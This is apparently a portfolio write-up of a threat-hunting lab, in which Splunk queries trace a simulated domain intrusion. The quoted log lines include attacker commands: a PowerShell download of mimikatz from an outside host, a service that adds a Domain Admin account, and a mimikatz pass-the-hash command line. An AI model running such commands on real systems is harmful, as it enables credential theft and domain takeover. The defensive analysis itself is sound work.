Loading
Loading Artifacts

Qays Sarayra Artifacts Qays Sarayra Artifacts

Portfolio

Phase 2 Splunk

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

Output:

ecthp
history
main
summary
index=* | stats values(source)

Output:

WinEventLog:Application
WinEventLog:Microsoft-Windows-PowerShell/Operational
WinEventLog:Microsoft-Windows-Sysmon/Operational
WinEventLog:Microsoft-Windows-TaskScheduler/Operational
WinEventLog:Microsoft-Windows-WMI-Activity/Operational
WinEventLog:Microsoft-Windows-WinRM/Operational
WinEventLog:Security
WinEventLog:System
WinEventLog:Windows PowerShell
index=* 
| stats count by host

Output:

CLIENT  67466
PROD    1889
SECLOGS 1419

scanning all the users:

index=ecthp source="WinEventLog:Security" 
| stats values(Account_Name) as Users
-
ANONYMOUS LOGON
Administrator
Administrator@RESEARCH.SECURITY.LOCAL
CLIENT$
CLIENT$@RESEARCH.SECURITY.LOCAL
CN=iwonthegame,CN=Users,DC=research,DC=SECURITY,DC=local
DWM-3
LOCAL SERVICE
PROD$
SECLOGS$
SECLOGS$@RESEARCH.SECURITY.LOCAL
SYSTEM
admin
administrator
administrator@research.security.local
bob
deskadmin
iwonthegame
john
nick
officedesk
officedesk@RESEARCH.SECURITY.LOCAL
sysadmin
sysuser

filter all users that have Privilege

index=ecthp source="WinEventLog:Security" EventCode=4672
| table _time, Account_Name, Privileges, host
| sort _time 
| dedup Account_Name, Privileges, host
2025-05-15 08:36:39 PROD$   SeSecurityPrivilege PROD
2025-05-15 08:43:04 sysuser SeSecurityPrivilege CLIENT
2025-05-15 08:48:00 PROD$   SeAuditPrivilege    PROD
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege   CLIENT
2025-05-15 08:49:06 SYSTEM  SeAssignPrimaryTokenPrivilege   CLIENT
2025-05-15 08:53:36 officedesk  SeSecurityPrivilege SECLOGS
2025-05-15 08:57:04 john    SeSecurityPrivilege CLIENT
2025-05-15 08:58:09 Administrator   SeSecurityPrivilege PROD
2025-05-15 08:59:54 administrator   SeSecurityPrivilege PROD
2025-05-15 09:00:46 SYSTEM  SeAssignPrimaryTokenPrivilege   PROD

First user got Privilege

index=ecthp source="WinEventLog:Security" EventCode=4672 host=CLIENT
| sort _time
| table _time, Account_Name, Privileges
| head 20
2025-05-15 08:43:04 sysuser SeSecurityPrivilege
2025-05-15 08:43:22 sysuser SeSecurityPrivilege
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege
2025-05-15 08:49:06 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:31 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:33 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:36 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:57:04 john    SeSecurityPrivilege
2025-05-15 08:57:12 john    SeSecurityPrivilege
2025-05-15 09:02:06 SYSTEM  SeAssignPrimaryTokenPrivilege

Q1

According to the threat report, what two activities are associated with Silent Banshee's use of SMB?

Anwer:

Gaining access to remote systems
Spreading malware and other tools to other systems

Q2

Based on the Silent Banshee threat report, for what purpose would the attackers use a tool with the SHA256 hash of 92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50?

Answer:

Gathering credentials from Windows systems

Q3

On the system that was initially compromised, the attackers were able to successfully download a malicious tool to use to gather more information about the network. What is the full folder name (ex: c:\folder\subfolder) of where they saved this file as it was downloaded?

Query:

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
| search TargetFilename="*.exe" OR TargetFilename="*.ps1"
| table _time, host, TargetFilename, Image

Output:


2025-05-15 08:46:37 CLIENT  C:\Windows\Temp\dyaql0fe.ch5.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:45:00 CLIENT  C:\Users\Public\Update.exe  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:45:00 CLIENT  C:\Windows\Temp\1o55y2qy.sgv.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:44:27 CLIENT  C:\Windows\Temp\wahee5d1.0eb.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:43:26 CLIENT  C:\Windows\Temp\5wqrqtvz.ouw.ps1    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:43:25 CLIENT  C:\Windows\Temp\aoyfx0qq.huf.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:52:25 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:51:36 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:49:54 CLIENT  C:\Users\officedesk\AppData\Local\Temp\3\zzwmcin0.run.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:03:27 CLIENT  C:\Users\Administrator\AppData\Local\Temp\2\gos5h2n4.4ar.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:03:26 CLIENT  C:\Users\Administrator\AppData\Local\Temp\2\obmasdlk.5bx.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:00:46 PROD    C:\Users\Administrator\AppData\Local\Temp\zjq0dzgj.5mj.ps1  C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:57:07 CLIENT  C:\Users\john\AppData\Local\Temp\dldlopv0.e5l.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:56:29 CLIENT  C:\Users\Public\test.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:56:27 CLIENT  C:\Users\officedesk\AppData\Local\Temp\3\pkoweplj.3qv.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:55:20 SECLOGS C:\Users\Public\abce.exe    C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:53:47 SECLOGS C:\Users\officedesk\AppData\Local\Temp\3u1wmzhw.5k4.ps1 C:\Windows\system32\wsmprovhost.exe

Answer:

C:\Users\Public

to make sure

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
| search TargetFilename="*.exe"
| sort _time
| table _time, host, TargetFilename, Image
| head 20

Output:

2025-05-15 08:45:00 CLIENT  C:\Users\Public\Update.exe  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:51:36 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:52:25 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:55:20 SECLOGS C:\Users\Public\abce.exe    C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:56:29 CLIENT  C:\Users\Public\test.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Q4

What user account was the attacker able to compromise to begin their attack?

index=ecthp host=CLIENT sysuser earliest="05/15/2025:08:42:00" latest="05/15/2025:08:45:00"
| sort _time
| table _time, EventCode, Account_Name, source 
| dedup  EventCode, Account_Name, source
2025-05-15 08:42:47 4625    
-
sysuser
    WinEventLog:Security
2025-05-15 08:43:04 4634    sysuser WinEventLog:Security
2025-05-15 08:43:04 5140    sysuser WinEventLog:Security
2025-05-15 08:43:04 4624    
-
sysuser
    WinEventLog:Security
2025-05-15 08:43:04 4672    sysuser WinEventLog:Security
2025-05-15 08:43:23 4674    sysuser WinEventLog:Security
  • 08:42:47 - EventCode 4625 (Failed Login) for sysuser
  • 08:43:04 - EventCode 4624 (Successful Login) for sysuser
  • 08:43:04 - EventCode 4672 (Special Privileges Assigned) for sysuser
  • 08:43:25 - First malicious PowerShell script created

Or check all failed login attempts before the successful one:

index=ecthp host=CLIENT EventCode=4625 earliest="05/15/2025:08:00:00" latest="05/15/2025:08:45:00"
| stats count by Account_Name
| sort -count

Output:

sysuser 1016
admin   1009
administrator   1009
bob 1009
deskadmin   1009
nick    1009
sysadmin    1009
Administrator   13

Answer:

sysuser

Q5

What is the earliest time as shown in Splunk (ex: 2:43:05.000 AM) that the attacker was able to download a suspicious PowerShell script?

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*.ps1" host=CLIENT
| sort _time
| head 1
| table _time, TargetFilename

Answer:

8:43:25.000 AM

Q6

What is the name of the object (ex: scheduled task, service, command, etc) the attacker creates on the PROD workstations to maintain their elevated access in the domain?

index=ecthp host=PROD (EventCode=7045 OR EventCode=4697)
| table _time, Service_Name, Service_File_Name, Account_Name
| sort _time

Output:

2025-05-15 09:00:38 Windows Performance C:\Windows\System32\cmd.exe /c net user iwonthegame Password123! /add /domain && net group "Domain Admins" iwonthegame /add /domain

Answer:

Windows Performance

Q7

What is the filename of the process that was launched to initiate a pass-the-hash attack? (filename only)

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| search CommandLine="*::*" OR CommandLine="*-hashes*" OR CommandLine="*NTLM*" OR Image="*mimikatz*" OR Image="*psexec*" OR Image="*wmiexec*" OR Image="*smbexec*"
| table _time, host, Image, CommandLine, User
| sort _time
C:\Users\Public\test.exe    "C:\Users\Public\test.exe" "sekurlsa::pth /user:administrator /domain:research.security.local /ntlm:84398159ce4d01cfe10cf34d5dae3909 /run:cmd.exe" exit

Answer:

test.exe

Q8

What is the URL the attacker uploads exfiltrated data to? (Format your answer as http://IP:PORT/path)

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| search CommandLine="*10.0.0.11*" OR CommandLine="*UploadString*" OR CommandLine="*WebClient*"
| table _time, CommandLine

Output:

2025-05-15 08:44:59 powershell  -Command "iwr -UseBasicParsing -Uri http://10.0.0.11/mimikatz.exe -OutFile C:\Users\Public\Update.exe"
2025-05-15 08:44:27 powershell  -Command "iwr -UseBasicParsing -Uri http://10.0.0.11/mimikatz.exe -OutFile C:\Users\Public\Update.exe"
index=ecthp EventCode=3 DestinationIp="10.0.0.11" DestinationPort=80
| table _time, Image, CommandLine, DestinationIp, DestinationPort

Output:

2025-05-15 08:50:04 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:51:38 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:52:26 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:56:31 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
index=ecthp "10.0.0.11" (upload OR POST OR PUT)
| table _time, host, source, CommandLine, _raw
| sort _time

The attacker uploaded exfiltrated data using:

Answer:

http://10.0.0.11:8000/upload

Q9

What is the FQDN (ex: workstation.network.local) of the machine that the attackers initially compromised?

Answer:

client.research.SECURITY.local

All Content

Network

Network phase

Network Packet/Traffic Analysis Memory Analysis/Forensics Data Enrichment and Correlation IOC-Based Threat Hunting

ELK

ELK phase

Network Packet/Traffic Analysis Memory Analysis/Forensics Data Enrichment and Correlation IOC-Based Threat Hunting
0/1000
Loading comments...